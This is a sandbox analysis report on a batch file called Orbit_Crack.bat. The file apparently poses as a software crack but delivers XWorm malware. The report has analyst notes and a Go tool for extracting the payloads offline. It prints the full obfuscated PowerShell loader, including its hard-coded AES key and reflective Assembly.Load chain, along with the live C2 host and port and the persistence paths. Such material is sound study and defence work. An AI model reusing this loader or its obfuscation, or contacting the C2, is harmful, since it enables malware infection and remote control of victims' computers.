Analysis
max time kernel: 149s
max time network: 50s
platform: windows10-2004_x64
resource: win10v2004-20240419-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-04-2024 10:32
Static task: static1
General
Target: Orbit_Crack.bat
Size: 259KB
MD5: 1ccd59dd2bbf3dc838039654fed99860
SHA1: 1d27c800b05db1f244afeaab7cd6f79549af0ff8
SHA256: d3dea32d8b022205401a7d5023c1fb63577021b8c38d1b8af43e166fbaa15b24
SHA512: 58f44f000191551055f4d4fe001e4471ee2b8292cdecd14a6548d5917d78f886a92f4764ab9aea6273755c3da95d2bd0108350d3e11273f729759f140943fb4c
SSDEEP: 6144:AE29oanve5LJRxPZ9Q9lgj3B8BlKcurMBZoE589vlwaSIS:AVI5dP89yjGlKcCcasd
Malware Config
Extracted
Family: xworm
Version: 5.0
C2: youth-oecd.gl.at.ply.gg:37887
Mutex: irLH7SnIzjCRjwMK
Install_directory: %Userprofile%
install_file: USB.exe

Notes on the config: the C2 host is a *.ply.gg name, i.e. a playit.gg tunnel endpoint, so whatever IP it resolves to belongs to the tunnel service rather than to operator-owned infrastructure; hunt and block on the hostname:port pair, not only on the resolved address. The configured install name (USB.exe under %Userprofile%) is not what this run actually wrote to disk: the dropped files are C:\Users\Admin\WindowsSys32 and the Startup shortcut WindowsSys32.lnk (see Downloads), so file-based IOCs should include both names.
Signatures

Detect Xworm Payload (1 IoC)
  resource: behavioral1/memory/380-15-0x0000023941390000-0x000002394139E000-memory.dmp
  yara_rule: family_xworm
  The family match is on a 56KB region of powershell.exe (PID 380) memory, consistent with the assembly the loader decrypts and hands to Assembly.Load; no file on disk matched.

Drops startup file (2 IoCs)
  Processes: powershell.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk (powershell.exe)

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes: taskmgr.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 (taskmgr.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
  Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
  Caveat: every hit here comes from taskmgr.exe (PID 2380), which sits at the top level of the process tree beside cmd.exe rather than underneath it. Task Manager reads the disk's FriendlyName for its own Performance view, so this signature reflects the sandbox's Task Manager instance, not anti-analysis logic in the sample. The same applies to the EnumeratesProcesses, GetForegroundWindowSpam, FindShellTrayWindow and SendNotifyMessage hits attributed to PID 2380 below.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / process: 380 powershell.exe (2 hits), 2380 taskmgr.exe (62 hits)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid / process: 2380 taskmgr.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: powershell.exe, taskmgr.exe
  Token: SeDebugPrivilege (380 powershell.exe)
  Token: SeDebugPrivilege (380 powershell.exe)
  Token: SeDebugPrivilege (2380 taskmgr.exe)
  Token: SeSystemProfilePrivilege (2380 taskmgr.exe)
  Token: SeCreateGlobalPrivilege (2380 taskmgr.exe)
  The two SeDebugPrivilege enables in powershell.exe (PID 380) are the sample's, i.e. the reflectively loaded code asking for debug rights; the three in taskmgr.exe are Task Manager's normal privilege set.

Suspicious use of FindShellTrayWindow (64 IoCs)
  pid / process: 2380 taskmgr.exe (64 hits)

Suspicious use of SendNotifyMessage (64 IoCs)
  pid / process: 2380 taskmgr.exe (64 hits)

Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: cmd.exe
  PID 2896 (cmd.exe) wrote to memory of PID 380 (powershell.exe), 2 events
  Both writes are parent-to-child at process creation (cmd.exe launching powershell.exe), not injection into an unrelated process.
Processes

C:\Windows\system32\cmd.exe (PID 2896, depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 380, depth 2, child of cmd.exe)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TCHWop+rKfjAUs8Gc6EIcZq3gKQUIuwod9lLSwDglHo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ANiW1ohpeww6mPCu5XWnXw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EobxR=New-Object System.IO.MemoryStream(,$param_var); $NLGjA=New-Object System.IO.MemoryStream; $XEFMi=New-Object System.IO.Compression.GZipStream($EobxR, [IO.Compression.CompressionMode]::Decompress); $XEFMi.CopyTo($NLGjA); $XEFMi.Dispose(); $EobxR.Dispose(); $NLGjA.Dispose(); $NLGjA.ToArray();}function execute_function($param_var,$param2_var){ $DLBIf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lObjd=$DLBIf.EntryPoint; $lObjd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat';$LWqwg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat').Split([Environment]::NewLine);foreach ($IVrtL in $LWqwg) { if ($IVrtL.StartsWith(':: ')) { $VyyZA=$IVrtL.Substring(3); break; }}$payloads_var=[string[]]$VyyZA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Loader breakdown: the script reads its own .bat file (ReadAllText, spelled backwards as 'txeTllAdaeR'), takes the first line that begins with ':: ' (a batch comment, so cmd.exe ignores it), splits that line on '\' into two blobs, and for each blob does base64-decode -> AES-CBC/PKCS7 decrypt with the hard-coded key and IV -> GZip decompress -> [System.Reflection.Assembly]::Load -> invoke the entry point (the first with $null arguments, the second with an empty string array). Method names are stored reversed ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' is Load) to defeat naive string matching on the command line. The loader itself writes nothing decrypted to disk, which is why the XWorm YARA match lands in powershell.exe memory.

C:\Windows\system32\notepad.exe (depth 1)
  Command line: "C:\Windows\system32\notepad.exe"

C:\Windows\system32\taskmgr.exe (PID 2380, depth 1)
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
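The loader's decode pipeline re-implemented offline, added here as an example (Go, not code from the report or from the sample): it takes the AES key and IV exactly as the command line above hands them to FromBase64String, then applies base64 -> AES-CBC/PKCS7 -> gzip to every '\'-separated blob on the ':: ' carrier line, which is how an analyst recovers the two .NET assemblies from Orbit_Crack.bat without running anything. SampleBat and the payload strings it packs are constructed test input; feeding the real .bat's contents to ExtractPayloads with the same key/IV yields the actual assemblies.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"strings"
)

// Key and IV exactly as the loader's command line hands them to FromBase64String.
const (
	LoaderKeyB64 = "TCHWop+rKfjAUs8Gc6EIcZq3gKQUIuwod9lLSwDglHo="
	LoaderIVB64  = "ANiW1ohpeww6mPCu5XWnXw=="
)

// KeyIV decodes the embedded key (32 bytes, so AES-256) and IV (one AES block).
func KeyIV() ([]byte, []byte, error) {
	key, err1 := base64.StdEncoding.DecodeString(LoaderKeyB64)
	iv, err2 := base64.StdEncoding.DecodeString(LoaderIVB64)
	if err1 != nil || err2 != nil || len(key) != 32 || len(iv) != aes.BlockSize {
		return nil, nil, errors.New("embedded key/IV are not base64 of 32 and 16 bytes")
	}
	return key, iv, nil
}

// Unpack reverses decrypt_function + decompress_function: base64 -> AES-CBC with PKCS7
// padding -> gzip. A wrong key/IV fails the padding or gzip header check, never silently.
func Unpack(blobB64 string, key, iv []byte) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(blobB64)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of AES blocks")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad PKCS7 padding (wrong key/IV?)")
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt[:len(pt)-pad]))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(zr)
}

// ExtractPayloads mirrors the loader's file handling: the first ":: " line of the .bat is
// the carrier; blobs are joined by '\', which never occurs in base64, so a plain split works.
func ExtractPayloads(bat string, key, iv []byte) ([][]byte, error) {
	for _, line := range strings.Split(bat, "\n") {
		if !strings.HasPrefix(line, ":: ") {
			continue
		}
		var out [][]byte
		for i, part := range strings.Split(strings.TrimRight(line[3:], "\r"), `\`) {
			p, err := Unpack(part, key, iv)
			if err != nil {
				return nil, fmt.Errorf("payload %d: %w", i, err)
			}
			out = append(out, p)
		}
		return out, nil
	}
	return nil, errors.New("no ':: ' carrier line found")
}

// SampleBat builds a constructed Orbit_Crack.bat stand-in (test input only) by pushing the
// given strings through the forward pipeline (gzip -> AES-CBC/PKCS7 -> base64) with the real key/IV.
func SampleBat(payloads ...string) (string, []byte, []byte, error) {
	key, iv, err := KeyIV()
	if err != nil {
		return "", nil, nil, err
	}
	block, _ := aes.NewCipher(key) // key length already checked in KeyIV
	parts := make([]string, 0, len(payloads))
	for _, s := range payloads {
		var gz bytes.Buffer
		zw := gzip.NewWriter(&gz)
		zw.Write([]byte(s))
		zw.Close()
		pad := aes.BlockSize - gz.Len()%aes.BlockSize // PKCS7 always adds 1..16 bytes
		pt := append(gz.Bytes(), bytes.Repeat([]byte{byte(pad)}, pad)...)
		ct := make([]byte, len(pt))
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
		parts = append(parts, base64.StdEncoding.EncodeToString(ct))
	}
	bat := "@echo off\r\n:: " + strings.Join(parts, `\`) + "\r\nrem loader line omitted\r\n"
	return bat, key, iv, nil
}
```

On the real file, each recovered payload should begin with the MZ header, since Assembly.Load only accepts a PE image; the first one is what the loader invokes with $null, the second with an empty string array. Because the key and IV sit in the command line and the carrier line is a batch comment, the same extractor works on any other .bat built by this loader once you substitute its key/IV constants.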
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mnza3vxv.zk4.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  Note: PowerShell writes a __PSScriptPolicyTest_*.ps1 probe on startup to test script enforcement policy; it is a by-product of powershell.exe running, not a file dropped by the sample, so do not use it as an IOC.

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk
  Filesize: 779B
  MD5: 620d681b7ed901572838ed0085058c14
  SHA1: 8155ab8f1a73961dd283ec71c48bbc62614d2ce9
  SHA256: 1b0d34376e277bfa4c820f2a8f19e72bdb5b387f54bf990e0393959b24ac16b3
  SHA512: 48b2642853aba1585c612401247fd757e341846878805768af4acf848f39f12ae8f0fac3999e7c3add68d85723c28fc935f88c9bba1e9745e8f2c9581c89980b

C:\Users\Admin\WindowsSys32
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Memory dumps (powershell.exe, PID 380)
  memory/380-9-0x0000023941300000-0x0000023941322000-memory.dmp  Filesize: 136KB
  memory/380-10-0x00007FFF276D0000-0x00007FFF28191000-memory.dmp  Filesize: 10.8MB
  memory/380-12-0x0000023941400000-0x0000023941410000-memory.dmp  Filesize: 64KB
  memory/380-11-0x0000023941400000-0x0000023941410000-memory.dmp  Filesize: 64KB
  memory/380-13-0x0000023941350000-0x0000023941358000-memory.dmp  Filesize: 32KB
  memory/380-14-0x0000023941360000-0x0000023941392000-memory.dmp  Filesize: 200KB
  memory/380-15-0x0000023941390000-0x000002394139E000-memory.dmp  Filesize: 56KB (family_xworm YARA match)
  memory/380-35-0x0000023941400000-0x0000023941410000-memory.dmp  Filesize: 64KB
  memory/380-34-0x00007FFF276D0000-0x00007FFF28191000-memory.dmp  Filesize: 10.8MB

Memory dumps (taskmgr.exe, PID 2380; all the same 4KB page, sandbox-launched process)
  memory/2380-20-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-26-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-27-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-31-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-30-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-29-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-28-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-25-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-21-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB
  memory/2380-19-0x0000028505150000-0x0000028505151000-memory.dmp  Filesize: 4KB